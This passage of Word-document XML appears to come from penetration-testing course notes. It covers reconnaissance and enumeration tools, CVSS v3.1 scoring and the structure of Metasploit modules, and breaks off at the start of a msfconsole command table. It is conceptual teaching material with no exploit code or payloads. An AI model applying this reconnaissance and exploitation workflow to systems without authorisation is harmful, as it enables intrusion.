          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Explain the complete passive-to-active reconnaissance workflow a penetration tester would follow against an authorised target, naming the tools used at each stage and the type of information each one contributes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The workflow begins with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">passive reconnaissance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, which gathers information with zero risk of detection. WHOIS reveals registrar and (if unmasked) registrant details; DNS queries via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">dig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nslookup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> map A, MX, NS and TXT records and test for a vulnerable zone transfer; Shodan surfaces already-indexed exposed services; theHarvester aggregates emails and subdomains from search engines and certificate transparency logs; Maltego visually links all these entities together; and LinkedIn OSINT builds a picture of employees and technology in use — all without a single packet reaching the target.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The tester then moves to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">active reconnaissance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, which does contact the target directly. Nmap scans (SYN, Connect, UDP, stealth variants, aggressive, version and OS detection) enumerate live hosts, open ports and running service versions. NSE scripts and timing templates add automated vulnerability checks while controlling speed versus stealth. Netcat banner grabbing manually confirms service versions found by Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Next comes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">enumeration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, going deeper into specific protocols: enum4linux pulls usernames, shares and policy from SMB; SNMP walking reads a device's management information base; SMTP VRFY/EXPN and NetBIOS queries add further username and host identification.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally, results are consolidated into a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">service inventory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and run through a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">vulnerability scanner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, whose findings are scored with CVSS v3.1, cross-referenced against nvd.nist.gov for CVE details, and manually validated to eliminate false positives — producing the prioritised, defensible finding list that feeds into exploitation (Unit III) and reporting (Unit V).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Describe the six CVSS v3.1 base metrics and work through how they would be assessed for (a) an unauthenticated remote code execution vulnerability and (b) a vulnerability requiring local access and user interaction, explaining why their resulting severities differ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The six CVSS v3.1 base metrics are: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Vector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Network/Adjacent/Local/Physical — how the flaw is reached), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Complexity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Low/High — whether special conditions are needed), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Privileges Required</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (None/Low/High — access needed beforehand), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">User Interaction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (None/Required — whether a victim must act), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Scope</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Unchanged/Changed — whether impact crosses a security boundary), and the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Confidentiality/Integrity/Availability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> impact ratings (None/Low/High).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">(a) An unauthenticated remote code execution flaw would typically score Attack Vector: Network (reachable over the internet), Attack Complexity: Low (reliably exploitable), Privileges Required: None (no login needed), User Interaction: None (no victim action needed), and High impact on all of Confidentiality, Integrity and Availability, since full code execution usually means complete compromise. This combination pushes the base score into the Critical band (9.0–10.0).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">(b) A vulnerability needing local access and user interaction — for instance a malicious document that must be opened by a logged-in user — would score Attack Vector: Local, Privileges Required: Low (the victim must already be logged in), and User Interaction: Required. Even if the eventual impact is also High across C/I/A, the extra conditions needed for exploitation (an attacker needs some access or must convince a user to act) significantly lower the base score, typically into the Medium or High band rather than Critical.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The difference illustrates CVSS's core design principle: severity reflects not just </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">what</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> an attacker could achieve, but </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">how easily</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> they could achieve it — which is exactly why raw scores must be read in full, not just by their final number.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Unit III — Exploitation, Metasploit &amp; Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This unit covers turning a found weakness into actual access using the Metasploit Framework, then turning a low-privilege foothold into full administrative control, and finally testing password strength directly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 Metasploit Framework Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit Framework</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the most widely used platform for developing, testing and running exploits in a controlled way. It organises functionality into </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">modules</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, so a tester combines ready-made building blocks instead of writing an attack from scratch each time.</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1949"/>
        <w:gridCol w:w="7797"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>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Module Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7797"/>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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>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Auxiliary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7797"/>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Supporting actions that are not exploits themselves — scanners, fuzzers, login brute-forcers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>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Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7797"/>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Code that takes advantage of a specific vulnerability to execute attacker-supplied code on the target</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>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Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7797"/>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The actual code that runs after an exploit succeeds — e.g. opening a shell or a Meterpreter session</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>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Encoder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7797"/>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Reshapes a payload's bytes to avoid bad characters or basic signature-based detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>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NOP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7797"/>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“No operation” padding used to keep a payload's memory alignment stable during an exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>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Post</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7797"/>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Modules that run after a session is established — gathering data, escalating privileges, pivoting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="EEF3F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0E7C7B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">■ Metasploit module architecture</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">msfconsole</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  |-- Exploit module  (targets a specific CVE/weakness)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  |       \-- carries --&gt; Payload module (shell / Meterpreter / ...)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  |-- Auxiliary module (scanner, brute-forcer, DoS, etc. - no payload)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  |-- Encoder module   (optional - reshapes payload bytes)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  \-- Post module       (runs after a session exists - loot, escalate, pivot)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 msfconsole Commands and Core Variables</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2144"/>
        <w:gridCol w:w="7602"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2144"/>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Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7602"/>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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2144"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">search</w:t>
            </w:r>
          </w:p>
